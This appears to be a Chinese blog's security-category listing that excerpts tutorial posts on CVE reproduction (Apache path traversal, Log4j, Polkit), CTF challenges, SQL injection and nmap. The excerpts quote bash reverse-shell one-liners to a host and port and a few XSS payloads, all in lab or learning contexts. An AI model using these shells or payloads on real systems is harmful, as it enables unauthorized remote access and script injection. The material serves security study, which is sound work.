信息安全
文章平均质量分 62
csd_ct
计算机技术的狂热爱好者
展开
-
红队体系化学习总结
单点的方法均会向方法论过渡。由单维解决方法逐渐向通用解决方案过渡。背后的本质都是知识的体系化。框架后再聚焦,最后量变引起质变。----摘抄于某圈内大佬今天逛论坛时,看到某大佬发的2张图,拜读一下,感叹学海无涯,还没领会到一半,路漫漫还长远啊,自己还差的远。以下图片及知识体系的总结来源于转载。敏捷渗透:红队体系化:...原创 2022-02-21 21:07:30 · 461 阅读 · 0 评论 -
勒索病毒解密工具
加密勒索病毒猖獗,最近逛论坛看到2个好的勒索病毒与解密的站点,记录下,以备不时之需:1、360勒索病毒解密,https://lesuobingdu.360.cn/2.深信服勒索解密工具,https://mp.weixin.qq.com/s/EDJMABKxNMFYDrTEctFYRQ...原创 2022-02-14 17:57:54 · 11578 阅读 · 1 评论 -
log4j漏洞分析及总结
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。漏洞描述及影响log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。原创 2022-02-14 00:15:39 · 45260 阅读 · 2 评论 -
apache-CVE-2021-41773[42013]-反弹shell
CVE-2021-41773-反弹shellapache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功‘’’bash -i >& /de/tcp/ip/port 0>&1‘’’经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错,很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的原创 2022-02-06 17:24:41 · 1861 阅读 · 1 评论 -
apache-CVE-2021-41773[42013]-本地验证
cve-2021-41773本地验证上次在验证41773时,使用bash命令反弹shell不成功,vulfocus上提供的时在线靶场环境有时间限制,且无法看到后台日志,不知道时哪里出错了,于是决定从0到1开始,在本地搭建一个实验环境,看看是哪里出现了问题搭建本地验证环境docker 中直接拉取apache 2.4.49的镜像docker pull httpd:2.4.49docker images 查看镜像,如图启动该镜像,运行apache, docker run -d -p 80:80原创 2022-02-06 16:11:25 · 3212 阅读 · 0 评论 -
apache-CVE-2021-41773[42013]-漏洞复现
apache-CVE-2021-41773[42013] 验证及复现CVE-2021-41773 影响范围为2.4.49CVE-2021-42013 影响范围为2.4.49/50漏洞验证41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图访问应用首页,可得到apche服务器版本信息,如图,验证目录遍历利用网上爆原创 2022-02-05 18:10:02 · 3405 阅读 · 2 评论 -
Linux提权(sudo、polkit)总结
Linux-polkit提权总结刚准备休年假,就收到监管的漏洞预警通-“Linux Polkit组件中pkexec程序存在权限提升漏洞(漏洞编号为CVE-2021-4034)。pkexec应用程序为Linux系统预装工具,漏洞影响Ubuntu、Debian、Fedora、CentOS等主流Linux发行版…“,啊,正值冬奥护网,各方都比较敏感,赶紧研究下,详见绿盟的CERT应急通知1、漏洞概述1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec中发现的一个权限提原创 2022-01-31 00:21:23 · 5557 阅读 · 0 评论 -
xss常用Payload总结
xss常用Payload总结渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势1.img 注入快速探测是否存在xss1) <img src='x' onerror='alert(1)'>2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">2.iframe 注入后台做了相原创 2022-01-03 14:12:39 · 12062 阅读 · 3 评论 -
nmap扫描之端口“filtered“被过滤的分析
最近在做渗透测试时,用nmap扫描目标网站的端口情况,发现某些端口的状态是"filtered",猜测是被防火墙过滤了,那怎么确定端口是否开启或者怎么绕过防火墙进行探测呢?研究了下nmap的高级用法。1、nmap常用扫描参数1.1 sT 扫描3次握手方式的TCP扫描,握手成功后会调用系统的connect函数。由于要完成TCP的3次握手,速度较慢,且这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。nmap默认的扫描方式是这种,如图,...原创 2021-11-22 17:15:07 · 38117 阅读 · 4 评论 -
PHP中命令执行的几种姿势总结(二)-高级用法
上一篇文章中介绍了php命令执行的几种姿势的基础用法 ,除了基础用法之外,还有几种高级用法可以考虑,在服务端过滤严格、安全措施较高的情况下,有时可以派上大用场。1、com组件的使用在php5.4及以上的版本中,可以开启com组件,直接执行某些cmd命令行,如在在php.ini文件中,开启extension=php_com_dotnet.dll...原创 2021-11-09 14:56:01 · 613 阅读 · 0 评论 -
PHP中命令执行的几种姿势总结(一)
命令执行是web攻击中常用的手法之一,在PHP中,可调用以下函数来实现命令执行,如1、exec()exec函数用的较少,主要是因为该函数默认返回值是执行结果的最后一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组,1.1 函数原型string exec ( string command, array &output, int &return_var)//command参数是要执行的命令//output数组是保存输出结果//return_va原创 2021-11-07 12:16:19 · 3961 阅读 · 0 评论 -
vulfocus 靶机环境搭建部署
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...原创 2021-11-05 19:21:13 · 21741 阅读 · 15 评论 -
从CTF比赛题看任意文件读取的危害
最近在CTF_HUB上看到任意文件读取的一道web渗透测试题,详见ctfhub 中web afr-3,突然想到2020年参加网鼎杯白虎组,有个picdown的题目大同小异,手法相似,对任意文件读取漏洞的危害做个总结。在afr-3中,任意文件读取漏洞如下,首先进入首页,如下图:点进去,首页是个输入框,输入test,提交查询,如图:在输入框这个地方存在xss,不过暂时先不管这个,重点关注任意文件读取。看到url中有个name=article,这个参数,猜测这个参数是突破点,将article.原创 2021-02-27 22:53:50 · 2490 阅读 · 0 评论 -
反弹shell的使用
反弹shell反弹shell,是指从受害者的机器上主动连接到指定的机器上的可交且能执行命令的TCP进程。反弹shell的前提是受害者的机器上有命令执行的漏洞。常见的一句话反弹shell,如下:bash 反弹shellbash -i >& /dev/tcp/127.0.0.1/9999 0>&1 2>&1 参数解释:bash -i:产生一个bash的交互环境“>&”:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者,将标准原创 2020-08-15 14:45:11 · 234 阅读 · 0 评论 -
sql注入-报错注入总结
1. 报错注入报错注入作为sql注入的一种有效手段,具有简单、快速、有效的特点,可快速的获取数据中想要的信息,常用的报错函数有4个:1.1. updatexml作用是更新符合xpath的xml对象中的内容为newvalue。函数原型为:updatexml(xmlobj,xpath,newvalue)xmlobj,即xml document 类型为string 格式xpath,类型为string,xpath语法的字符串newvalue,更新后的新值 sql注入中常用的姿势为:update原创 2020-07-26 23:23:58 · 432 阅读 · 0 评论 -
golang 检查系统中是否安装了某个软件
最近项目有个需求,需要当前判断系统中是否安装了chrome内核的浏览器,如360极速、msedge、chrome等,如果有获取浏览器的位置。网上有各种介绍C#、Python等语言可实现此功能。我的项目是用go开发的,自己整理了一下通过注册表来判断系统是否安装了某个软件。代码如下:// 通过注册表来判断是否安装了某个app// 传入appName,可以是正则表达式,也可以是app的名字// 返回系统中安装软件的路径,若找到了多个,返回路径数组package mainimport...原创 2020-07-05 00:20:45 · 1670 阅读 · 0 评论 -
从一道CTF题看整数溢出
整数溢出漏洞是程序开发过程中危害较大的一种漏洞,经常是PWN中各大神的突破点,利用此跳板,攻入系统,进而攻陷真个系统。此类漏洞不容易发觉,也不容易引起编程人员的注意。 近期在研究“网鼎杯2020白虎组”的比赛试题中,有一道RE逆向题目-“恶龙”,涉及到整数溢出,如利用此漏洞,可快速拿到Flag。本题解题思路有多种,详见 https://blog.csdn.net/Palmer9/article/details/106117208/,这篇博客中有详细的解释。网上大多数的解法是,动...原创 2020-06-07 23:35:48 · 1683 阅读 · 1 评论